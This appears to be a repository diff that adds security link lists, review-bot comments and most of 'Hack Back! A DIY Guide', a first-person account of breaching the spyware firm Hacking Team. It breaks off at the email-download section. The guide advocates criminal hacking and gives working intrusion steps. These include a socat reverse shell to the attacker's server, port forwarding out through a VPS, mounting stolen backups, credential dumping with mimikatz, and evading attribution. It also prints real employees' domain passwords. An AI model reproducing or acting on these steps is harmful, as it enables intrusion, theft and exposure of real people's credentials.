http://www.pentest.guru/index.php/2015/10/19/ditch-psexec-spraywmi-is-here/ | |||
blogs.technet.com/b/markrussinovich/archive/2005/08/17/unkillable-processes.aspx | |||
https://github.com/google/honggfuzz | |||
http://faydoc.tripod.com/cpu/index_a.htm | |||
http://fabiensanglard.net/reverse_engineering_strike_commander/index.php | |||
| **ClearImage Free Online Barcode Reader / Decoder** | http://online-barcode-reader.inliteresearch.com/ | |||
http://blog.sematext.com/2015/10/05/recipe-apache-logs-rsyslog-parsing-elasticsearch/ | |||
https://programmers.stackexchange.com/questions/7652/identifying-programming-languages-by-a-piece-of-code | |||
http://blogs.technet.com/b/markrussinovich/archive/2005/08/17/unkillable-processes.aspx | |||
https://github.com/iv-wrt/iv-wrt | |||
https://github.com/danielmiessler/SecLists | |||
http://sector876.blogspot.com/2013/03/backdooring-pe-files-part-1.html | |||
http://sector876.blogspot.com/2013/03/backdooring-pe-files-part-2.html | |||
Good source for internals section: http://blogs.technet.com/b/markrussinovich/archive/2008/11/17/3155406.aspx | |||
http://www.securitytracker.com/id/1032048 | |||
https://reverse.put.as/2015/05/29/the-empire-strikes-back-apple-how-your-mac-firmware-security-is-completely-broken/ | |||
https://trmm.net/SPI | |||
Defeating Sniffers and Intrustion Detection Systems - Horizon, 12/25/1998 | |||
Armouring the ELF: Binary Encryption on the UNIX Platform - grugq, scut, 12/28/2001 | |||
Runtime Process Infection - anonymous, 07/28/2002 | |||
Polymorphic Shellcode Engine Using Spectrum Analysis - theo detristan et al, 08/13/2003 | |||
Next-generation Runtime Binary Encryption using On-demand Function Extraction - Zeljko Vrba, 08/01/2005 | |||
Stealth Hooking: Another Way to Subvert the Windows Kernel - mxatone, ivanlef0u, 04/11/2008 | |||
Mystifying the Debugger for Ultimate Stealthness - halfdead, 04/11/2008 | |||
Binary Mangling with Radare - pancake, 06/11/2009 | |||
http://pr+ojectshellcode.com/?q=node/12 | |||
http://fileformats.archiveteam.org/wiki/Encyclopedia_of_Graphics_File_Formats | |||
[](https://github.com/rrbranco/Troopers2015) | |||
[pwndbg - Making debugging suck less](https://github.com/zachriggle/pwndbg) | |||
* A PEDA replacement. In the spirit of our good friend windbg, pwndbg is pronounced pwnd-bag. | |||
* Uses capstone as backend. | |||
********* | |||
IPv6 | |||
IPv6: Basic Attacks and Defences - Christopher Werny[TROOPERS15] | |||
* [Part 1](https://www.youtube.com/watch?v=Y8kjQEGHbAU) | |||
* [Part 2](https://www.youtube.com/watch?v=V-GYPp-j-lE) | |||
http://www.legbacore.com/Research.html | |||
** | |||
Decode Shellcode from cli: cat shellcode | rasm2 -d - | |||
** | |||
cachecrew.com/fixing-an-infected-php-web-server/ | |||
https://www.reddit.com/r/lowlevel/comments/30toah/advices_for_a_bootloader/ | |||
https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet | |||
https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet | |||
********* | |||
General Section? | |||
******** | |||
[The foundation is rotting and the basement is flooding: A deeper look at the implicit trust relationships in your organization](https://www.youtube.com/watch?v=nL64uj9Xm24) | |||
******** | |||
https://mobilesecuritywiki.com/ | |||
http://seclists.org/fulldisclosure/2015/Mar/67 | |||
http://www.lexsi-leblog.com/cert-en/qemu-gdb-pe-imports.html | |||
https://en.wikipedia.org/wiki/Homomorphic_encryption | |||
MS Assessment Deployment Toolkit - Measure boot times among other things | |||
seclists.org/fulldisclosure/2015/Mar/90 | |||
http://ytliu.info/blog/2014/05/31/blind-return-oriented-programming-brop-attack-yi/ | |||
https://www.segger.com/jlink-debug-probes.html | |||
http://www.atmel.com/tools/rzusbstick.aspx | |||
http://store.atmel.com/PartDetail.aspx?q=p:10500060#tc:description | |||
appleexaminer.com | |||
https://the.bytecode.club/ | |||
http://waleedassar.blogspot.com/ | |||
https://github.com/isislab/Project-Ideas/wiki/Program-Analysis | |||
https://github.com/isislab/Project-Ideas/wiki/Embedded-Device-Security | |||
https://github.com/isislab/Project-Ideas/wiki/Application-Security | |||
http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607 | |||
[List of hacker sites](http://link-base.org/) | |||
https://github.com/iagox86/dnscat2/tree/v0.01 | |||
http://opensecuritytraining.info/MalwareDynamicAnalysis_files/MalwareDynamicAnalysis02.pdf | |||
http://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-cactuscon-on-april-4-2014 | |||
http://www.panelguides.com/index.php?option=com_jdownloads&Itemid=13 | |||
http://cs.gmu.edu/~astavrou/research/PyTrigger_ARES2013.pdf | |||
http://www.myopenrouter.com/article/10917/Port-Mirroring-Span-Port-Monitor-Port-with-iptables-on-NETGEAR-WGR614L/ | |||
http://netdude.sourceforge.net/ | |||
Cull the interesting papers | |||
http://www.covert.io/ | |||
http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/ | |||
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications. | |||
http://siis.cse.psu.edu/ | |||
http://c7zero.info/ | |||
Lookat http://www.cl.cam.ac.uk/~sps32/PartII_030214.pdf | |||
Check under research section | |||
http://www.cl.cam.ac.uk/~sps32/ | |||
Go through | |||
https://santoku-linux.com/howtos | |||
Compare resources against what power-view can grab | |||
Compare against sysmon service for scaling, setting it as service with scripting | |||
http://www.codeproject.com/Articles/36907/How-to-develop-your-own-Boot-Loader | |||
http://0xdabbad00.com/2013/09/02/file-scanner-web-app-part-1-of-5-stand-up-and-webserver/ | |||
https://addons.mozilla.org/en-US/firefox/addon/ssleuth/ |
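Review bot: Before merging this deletion, confirm that the primary references buried in it were relocated, because the removed list mixes untriaged scratch (a duplicated Russinovich "unkillable processes" URL, a broken "http://pr+ojectshellcode.com" URL with a stray "+", an empty-text link to rrbranco/Troopers2015, a truncated table fragment "| **Security", and editorial to-dos such as "Cull the interesting papers" and "Go through") with material of lasting value: the OWASP Secure Coding and Application Security Architecture cheat sheets, google/sanitizers, honggfuzz, SecLists, Mozilla MIG, the OSDev Stack Smashing Protector page, dnscat2, and the legbacore and Cambridge (sps32) firmware and hardware security research that the notes themselves flag with "Lookat" and "Check under research section". The dated article list (Horizon 1998 through pancake 2009) carries titles and authors but no URLs, so if it is wanted later it can only be recovered from the titles; a one-line pointer to where these were triaged would make the deletion reviewable.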
@ -0,0 +1,14 @@ | |||
##Game Hacking | |||
Pince - https://github.com/korcankaraokcu/PINCE | |||
PINCE is a gdb front-end/reverse engineering tool focused on games, but it can be used for any reverse-engineering related stuff. PINCE is an abbreviation for "PINCE is not Cheat Engine". PINCE's GUI is heavily "inspired(;D)" by Cheat Engine. | |||
https://gbatemp.net/threads/arm9loader-technical-details-and-discussion.408537/ | |||
[The Multibillion Dollar Industry That's Ignored](http://www.irongeek.com/i.php?page=videos/derbycon4/t204-the-multibillion-dollar-industry-thats-ignored-jason-montgomery-and-ryan-sevey |
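Review bot: The "Multibillion Dollar Industry" link on the last line is missing its closing ")", so the markdown link will not render, and "##Game Hacking" needs a space after the hashes; it is also a second-level heading while the new Car Hacking file uses a first-level "#Car Hacking", so pick one level for these section files. The entries are inconsistent too: PINCE uses a bare "Name - URL" form while the talk uses a markdown link, and the arm9loader thread has no description at all; the PINCE line shows the useful pattern (tool, what it is, "PINCE is not Cheat Engine"), so give the other two entries the same one-line treatment.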
@ -0,0 +1,926 @@ | |||
_ _ _ ____ _ _ | |||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |||
| _ | (_| | (__| < | |_) | (_| | (__| <|_| | |||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |||
A DIY Guide | |||
,-._,-._ | |||
_,-\ o O_/; | |||
/ , ` `| | |||
| \-.,___, / ` | |||
\ `-.__/ / ,.\ | |||
/ `-.__.-\` ./ \' | |||
/ /| ___\ ,/ `\ | |||
( ( |.-"` '/\ \ ` | |||
\ \/ ,, | \ _ | |||
\| o/o / \. | |||
\ , / / | |||
( __`;-;'__`) \\ | |||
`//'` `||` `\ | |||
_// || __ _ _ _____ __ | |||
.-"-._,(__) .(__).-""-. | | | | |_ _| | | |||
/ \ / \ | | |_| | | | | | |||
\ / \ / | | _ | | | | | |||
`'-------` `--------'` __| |_| |_| |_| |__ | |||
#antisec | |||
--[ 1 - Introduction ]---------------------------------------------------------- | |||
You'll notice the change in language since the last edition [1]. The | |||
English-speaking world already has tons of books, talks, guides, and | |||
info about hacking. In that world, there's plenty of hackers better than me, | |||
but they misuse their talents working for "defense" contractors, for intelligence | |||
agencies, to protect banks and corporations, and to defend the status quo. | |||
Hacker culture was born in the US as a counterculture, but that origin only | |||
remains in its aesthetics - the rest has been assimilated. At least they can | |||
wear a t-shirt, dye their hair blue, use their hacker names, and feel like | |||
rebels while they work for the Man. | |||
You used to have to sneak into offices to leak documents [2]. You used to need | |||
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. | |||
Like the CNT said after the Gamma Group hack: "Let's take a step forward with | |||
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! | |||
[1] http://pastebin.com/raw.php?i=cRYvK4jb | |||
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI | |||
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html | |||
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf | |||
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group | |||
--[ 2 - Hacking Team ]---------------------------------------------------------- | |||
Hacking Team was a company that helped governments hack and spy on | |||
journalists, activists, political opposition, and other threats to their power | |||
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals | |||
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the | |||
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende | |||
RCS". They also claimed to have technology to solve the "problem" posed by Tor | |||
and the darknet [13]. But seeing as I'm still free, I have my doubts about | |||
its effectiveness. | |||
[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/ | |||
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html | |||
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/ | |||
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/ | |||
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/ | |||
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/ | |||
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/ | |||
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal | |||
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/ | |||
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/ | |||
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/ | |||
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html | |||
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web | |||
--[ 3 - Stay safe out there ]--------------------------------------------------- | |||
Unfortunately, our world is backwards. You get rich by doing bad things and go | |||
to jail for doing good. Fortunately, thanks to the hard work of people like | |||
the Tor project [1], you can avoid going to jail by taking a few simple | |||
precautions: | |||
1) Encrypt your hard disk [2] | |||
I guess when the police arrive to seize your computer, it means you've | |||
already made a lot of mistakes, but it's better to be safe. | |||
2) Use a virtual machine with all traffic routed through Tor | |||
This accomplishes two things. First, all your traffic is anonymized through | |||
Tor. Second, keeping your personal life and your hacking on separate | |||
computers helps you not to mix them by accident. | |||
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or | |||
something custom [6]. Here's [7] a detailed comparison. | |||
3) (Optional) Don't connect directly to Tor | |||
Tor isn't a panacea. They can correlate the times you're connected to Tor | |||
with the times your hacker handle is active. Also, there have been | |||
successful attacks against Tor [8]. You can connect to Tor using other | |||
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for | |||
cracking wifi. Another option is to connect to a VPN or a bridge node [10] | |||
before Tor, but that's less secure because they can still correlate the | |||
hacker's activity with your house's internet activity (this was used as | |||
evidence against Jeremy Hammond [11]). | |||
The reality is that while Tor isn't perfect, it works quite well. When I | |||
was young and reckless, I did plenty of stuff without any protection (I'm | |||
referring to hacking) apart from Tor, that the police tried their hardest | |||
to investigate, and I've never had any problems. | |||
[1] https://www.torproject.org/ | |||
[2] https://info.securityinabox.org/es/chapter-4 | |||
[3] https://www.whonix.org/ | |||
[4] https://tails.boum.org/ | |||
[5] https://www.qubes-os.org/doc/privacy/torvm/ | |||
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy | |||
[7] https://www.whonix.org/wiki/Comparison_with_Others | |||
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/ | |||
[9] http://www.wifislax.com/ | |||
[10] https://www.torproject.org/docs/bridges.html.en | |||
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html | |||
----[ 3.1 - Infrastructure ]---------------------------------------------------- | |||
I don't hack directly from Tor exit nodes. They're on blacklists, they're | |||
slow, and they can't receive connect-backs. Tor protects my anonymity while I | |||
connect to the infrastructure I use to hack, which consists of: | |||
1) Domain Names | |||
For C&C addresses, and for DNS tunnels for guaranteed egress. | |||
2) Stable Servers | |||
For use as C&C servers, to receive connect-back shells, to launch attacks, | |||
and to store the loot. | |||
3) Hacked Servers | |||
For use as pivots to hide the IP addresses of the stable servers. And for | |||
when I want a fast connection without pivoting, for example to scan ports, | |||
scan the whole internet, download a database with sqli, etc. | |||
Obviously, you have to use an anonymous payment method, like bitcoin (if it's | |||
used carefully). | |||
----[ 3.2 - Attribution ]------------------------------------------------------- | |||
In the news we often see attacks traced back to government-backed hacking | |||
groups ("APTs"), because they repeatedly use the same tools, leave the same | |||
footprints, and even use the same infrastructure (domains, emails, etc). | |||
They're negligent because they can hack without legal consequences. | |||
I didn't want to make the police's work any easier by relating my hack of | |||
Hacking Team with other hacks I've done or with names I use in my day-to-day | |||
work as a blackhat hacker. So, I used new servers and domain names, registered | |||
with new emails, and payed for with new bitcoin addresses. Also, I only used | |||
tools that are publicly available, or things that I wrote specifically for | |||
this attack, and I changed my way of doing some things to not leave my usual | |||
forensic footprint. | |||
--[ 4 - Information Gathering ]------------------------------------------------- | |||
Although it can be tedious, this stage is very important, since the larger the | |||
attack surface, the easier it is to find a hole somewhere in it. | |||
----[ 4.1 - Technical Information ]--------------------------------------------- | |||
Some tools and techniques are: | |||
1) Google | |||
A lot of interesting things can be found with a few well-chosen search | |||
queries. For example, the identity of DPR [1]. The bible of Google hacking | |||
is the book "Google Hacking for Penetration Testers". You can find a short | |||
summary in Spanish at [2]. | |||
2) Subdomain Enumeration | |||
Often, a company's main website is hosted by a third party, and you'll find | |||
the company's actual IP range thanks to subdomains like mx.company.com or | |||
ns1.company.com. Also, sometimes there are things that shouldn't be exposed | |||
in "hidden" subdomains. Useful tools for discovering domains and subdomains | |||
are fierce [3], theHarvester [4], and recon-ng [5]. | |||
3) Whois lookups and reverse lookups | |||
With a reverse lookup using the whois information from a domain or IP range | |||
of a company, you can find other domains and IP ranges. As far as I know, | |||
there's no free way to do reverse lookups aside from a google "hack": | |||
"via della moscova 13" site:www.findip-address.com | |||
"via della moscova 13" site:domaintools.com | |||
4) Port scanning and fingerprinting | |||
Unlike the other techniques, this talks to the company's servers. I | |||
include it in this section because it's not an attack, it's just | |||
information gathering. The company's IDS might generate an alert, but you | |||
don't have to worry since the whole internet is being scanned constantly. | |||
For scanning, nmap [6] is precise, and can fingerprint the majority of | |||
services discovered. For companies with very large IP ranges, zmap [7] or | |||
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web | |||
sites. | |||
[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html | |||
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf | |||
[3] http://ha.ckers.org/fierce/ | |||
[4] https://github.com/laramies/theHarvester | |||
[5] https://bitbucket.org/LaNMaSteR53/recon-ng | |||
[6] https://nmap.org/ | |||
[7] https://zmap.io/ | |||
[8] https://github.com/robertdavidgraham/masscan | |||
[9] http://www.morningstarsecurity.com/research/whatweb | |||
[10] http://blindelephant.sourceforge.net/ | |||
----[ 4.2 - Social Information ]------------------------------------------------ | |||
For social engineering, it's useful to have information about the employees, | |||
their roles, contact information, operating system, browser, plugins, | |||
software, etc. Some resources are: | |||
1) Google | |||
Here as well, it's the most useful tool. | |||
2) theHarvester and recon-ng | |||
I already mentioned them in the previous section, but they have a lot more | |||
functionality. They can find a lot of information quickly and | |||
automatically. It's worth reading all their documentation. | |||
3) LinkedIn | |||
A lot of information about the employees can be found here. The company's | |||
recruiters are the most likely to accept your connection requests. | |||
4) Data.com | |||
Previously known as jigsaw. They have contact information for many | |||
employees. | |||
5) File Metadata | |||
A lot of information about employees and their systems can be found in | |||
metadata of files the company has published. Useful tools for finding | |||
files on the company's website and extracting the metadata are metagoofil | |||
[1] and FOCA [2]. | |||
[1] https://github.com/laramies/metagoofil | |||
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html | |||
--[ 5 - Entering the network ]-------------------------------------------------- | |||
There are various ways to get a foothold. Since the method I used against | |||
Hacking Team is uncommon and a lot more work than is usually necessary, I'll | |||
talk a little about the two most common ways, which I recommend trying first. | |||
----[ 5.1 - Social Engineering ]------------------------------------------------ | |||
Social engineering, specifically spear phishing, is responsible for the | |||
majority of hacks these days. For an introduction in Spanish, see [1]. For | |||
more information in English, see [2] (the third part, "Targeted Attacks"). For | |||
fun stories about the social engineering exploits of past generations, see | |||
[3]. I didn't want to try to spear phish Hacking Team, as their whole business | |||
is helping governments spear phish their opponents, so they'd be much more | |||
likely to recognize and investigate a spear phishing attempt. | |||
[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html | |||
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ | |||
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf | |||
----[ 5.2 - Buying Access ]----------------------------------------------------- | |||
Thanks to hardworking Russians and their exploit kits, traffic sellers, and | |||
bot herders, many companies already have compromised computers in their | |||
networks. Almost all of the Fortune 500, with their huge networks, have some | |||
bots already inside. However, Hacking Team is a very small company, and most | |||
of it's employees are infosec experts, so there was a low chance that they'd | |||
already been compromised. | |||
----[ 5.3 - Technical Exploitation ]-------------------------------------------- | |||
After the Gamma Group hack, I described a process for searching for | |||
vulnerabilities [1]. Hacking Team had one public IP range: | |||
inetnum: 93.62.139.32 - 93.62.139.47 | |||
descr: HT public subnet | |||
Hacking Team had very little exposed to the internet. For example, unlike | |||
Gamma Group, their customer support site needed a client certificate to | |||
connect. What they had was their main website (a Joomla blog in which Joomscan | |||
[2] didn't find anything serious), a mail server, a couple routers, two VPN | |||
appliances, and a spam filtering appliance. So, I had three options: look for | |||
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the | |||
embedded devices. A 0day in an embedded device seemed like the easiest option, | |||
and after two weeks of work reverse engineering, I got a remote root exploit. | |||
Since the vulnerabilities still haven't been patched, I won't give more | |||
details, but for more information on finding these kinds of vulnerabilities, | |||
see [3] and [4]. | |||
[1] http://pastebin.com/raw.php?i=cRYvK4jb | |||
[2] http://sourceforge.net/projects/joomscan/ | |||
[3] http://www.devttys0.com/ | |||
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A | |||
--[ 6 - Be Prepared ]----------------------------------------------------------- | |||
I did a lot of work and testing before using the exploit against Hacking Team. | |||
I wrote a backdoored firmware, and compiled various post-exploitation tools | |||
for the embedded device. The backdoor serves to protect the exploit. Using the | |||
exploit just once and then returning through the backdoor makes it harder to | |||
identify and patch the vulnerabilities. | |||
The post-exploitation tools that I'd prepared were: | |||
1) busybox | |||
For all the standard Unix utilities that the system didn't have. | |||
2) nmap | |||
To scan and fingerprint Hacking Team's internal network. | |||
3) Responder.py | |||
The most useful tool for attacking windows networks when you have access to | |||
the internal network, but no domain user. | |||
4) Python | |||
To execute Responder.py | |||
5) tcpdump | |||
For sniffing traffic. | |||
6) dsniff | |||
For sniffing passwords from plaintext protocols like ftp, and for | |||
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR | |||
and NaGA, but it was hard to compile it for the system. | |||
7) socat | |||
For a comfortable shell with a pty: | |||
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port | |||
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ | |||
tcp:my_server:my_port | |||
And useful for a lot more, it's a networking swiss army knife. See the | |||
examples section of its documentation. | |||
8) screen | |||
Like the shell with pty, it wasn't really necessary, but I wanted to feel | |||
at home in Hacking Team's network. | |||
9) a SOCKS proxy server | |||
To use with proxychains to be able to access their local network from any | |||
program. | |||
10) tgcd | |||
For forwarding ports, like for the SOCKS server, through the firewall. | |||
[1] https://www.busybox.net/ | |||
[2] https://nmap.org/ | |||
[3] https://github.com/SpiderLabs/Responder | |||
[4] https://github.com/bendmorris/static-python | |||
[5] http://www.tcpdump.org/ | |||
[6] http://www.monkey.org/~dugsong/dsniff/ | |||
[7] http://www.dest-unreach.org/socat/ | |||
[8] https://www.gnu.org/software/screen/ | |||
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html | |||
[10] http://tgcd.sourceforge.net/ | |||
The worst thing that could happen would be for my backdoor or post-exploitation | |||
tools to make the system unstable and cause an employee to investigate. So I | |||
spent a week testing my exploit, backdoor, and post-exploitation tools in the | |||
networks of other vulnerable companies before entering Hacking Team's network. | |||
--[ 7 - Watch and Listen ]------------------------------------------------------ | |||
Now inside their internal network, I wanted to take a look around and think | |||
about my next step. I started Responder.py in analysis mode (-A to listen | |||
without sending poisoned responses), and did a slow scan with nmap. | |||
--[ 8 - NoSQL Databases ]------------------------------------------------------- | |||
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker | |||
community [1]. Just when I was worried that they'd finally patched all of the | |||
authentication bypass bugs in MySQL [2][3][4][5], new databases came into | |||
style that lack authentication by design. Nmap found a few in Hacking Team's | |||
internal network: | |||
27017/tcp open mongodb MongoDB 2.6.5 | |||
| mongodb-databases: | |||
| ok = 1 | |||
| totalSizeMb = 47547 | |||
| totalSize = 49856643072 | |||
... | |||
|_ version = 2.6.5 | |||
27017/tcp open mongodb MongoDB 2.6.5 | |||
| mongodb-databases: | |||
| ok = 1 | |||
| totalSizeMb = 31987 | |||
| totalSize = 33540800512 | |||
| databases | |||
... | |||
|_ version = 2.6.5 | |||
They were the databases for test instances of RCS. The audio that RCS records | |||
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came | |||
from this. They were spying on themselves without meaning to. | |||
[1] https://www.shodan.io/search?query=product%3Amongodb | |||
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql | |||
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html | |||
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c | |||
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html | |||
[6] https://ht.transparencytoolkit.org/audio/ | |||
--[ 9 - Crossed Cables ]-------------------------------------------------------- | |||
Although it was fun to listen to recordings and see webcam images of Hacking | |||
Team developing their malware, it wasn't very useful. Their insecure backups | |||
were the vulnerability that opened their doors. According to their | |||
documentation [1], their iSCSI devices were supposed to be on a separate | |||
network, but nmap found a few in their subnetwork 192.168.1.200/24: | |||
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) | |||
... | |||
3260/tcp open iscsi? | |||
| iscsi-info: | |||
| Target: iqn.2000-01.com.synology:ht-synology.name | |||
| Address: 192.168.200.66:3260,0 | |||
|_ Authentication: No authentication required | |||
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) | |||
... | |||
3260/tcp open iscsi? | |||
| iscsi-info: | |||
| Target: iqn.2000-01.com.synology:synology-backup.name | |||
| Address: 10.0.1.72:3260,0 | |||
| Address: 192.168.200.72:3260,0 | |||
|_ Authentication: No authentication required | |||
iSCSI needs a kernel module, and it would've been difficult to compile it for | |||
the embedded system. I forwarded the port so that I could mount it from a VPS: | |||
VPS: tgcd -L -p 3260 -q 42838 | |||
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838 | |||
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1 | |||
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it | |||
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1 | |||
The way I solved it was: | |||
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1 | |||
And now, after: | |||
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login | |||
...the device file appears! We mount it: | |||
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp | |||
and find backups of various virtual machines. The Exchange server seemed like | |||
the most interesting. It was too big too download, but it was possible to | |||
mount it remotely to look for interesting files: | |||
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk | |||
$ fdisk -l /dev/loop0 | |||
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT | |||
so the offset is 2048 * 512 = 1048576 | |||
$ losetup -o 1048576 /dev/loop1 /dev/loop0 | |||
$ mount -o ro /dev/loop1 /mnt/exchange/ | |||
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 | |||
we find the hard disk of the VM, and mount it: | |||
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ | |||
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1 | |||
...and finally we've unpacked the Russian doll and can see all the files from | |||
the old Exchange server in /mnt/part1 | |||
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf | |||
--[ 10 - From backups to domain admin ]----------------------------------------- | |||
What interested me most in the backup was seeing if it had a password or hash | |||
that could be used to access the live server. I used pwdump, cachedump, and | |||
lsadump [1] on the registry hives. lsadump found the password to the besadmin | |||
service account: | |||
_SC_BlackBerry MDS Connection Service | |||
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ | |||
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8. | |||
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!........... | |||
I used proxychains [2] with the socks server on the embedded device and | |||
smbclient [3] to check the password: | |||
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!' | |||
It worked! The password for besadmin was still valid, and a local admin. I | |||
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. | |||
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and | |||
got a bunch of passwords, including the Domain Admin: | |||
HACKINGTEAM BESAdmin bes32678!!! | |||
HACKINGTEAM Administrator uu8dd8ndd12! | |||
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin | |||
HACKINGTEAM m.romeo ioLK/(90 | |||
HACKINGTEAM l.guerra 4luc@=.= | |||
HACKINGTEAM d.martinez W4tudul3sp | |||
HACKINGTEAM g.russo GCBr0s0705! | |||
HACKINGTEAM a.scarafile Cd4432996111 | |||
HACKINGTEAM r.viscardi Ht2015! | |||
HACKINGTEAM a.mino A!e$$andra | |||
HACKINGTEAM m.bettini Ettore&Bella0314 | |||
HACKINGTEAM m.luppi Blackou7 | |||
HACKINGTEAM s.gallucci 1S9i8m4o! | |||
HACKINGTEAM d.milan set!dob66 | |||
HACKINGTEAM w.furlan Blu3.B3rry! | |||
HACKINGTEAM d.romualdi Rd13136f@# | |||
HACKINGTEAM l.invernizzi L0r3nz0123! | |||
HACKINGTEAM e.ciceri 2O2571&2E | |||
HACKINGTEAM e.rabe erab@4HT! | |||
[1] https://github.com/Neohapsis/creddump7 | |||
[2] http://proxychains.sourceforge.net/ | |||
[3] https://www.samba.org/ | |||
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf | |||
[5] https://github.com/gentilkiwi/mimikatz | |||
--[ 11 - Downloading the mail ]------------------------------------------------- | |||
With the Domain Admin password, I have access to the email, the heart of the | |||
company. Since with each step I take there's a chance of being detected, I | |||
start downloading their email before continuing to explore. Powershell makes | |||
it easy [1]. Curiously, I found a bug with Powershell's date handling. After | |||
downloading the emails, it took me another couple weeks to get access to the | |||
source code and everything else, so I returned every now and then to download | |||
the new emails. The server was Italian, with dates in the format | |||
day/month/year. I used: | |||
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} | |||
with New-MailboxExportRequest to download the new emails (in this case all | |||
mail since June 5). The problem is it says the date is invalid if you | |||
try a day larger than 12 (I imagine because in the US the month comes first | |||
and you can't have a month above 12). It seems like Microsoft's engineers only | |||
test their software with their own locale. | |||
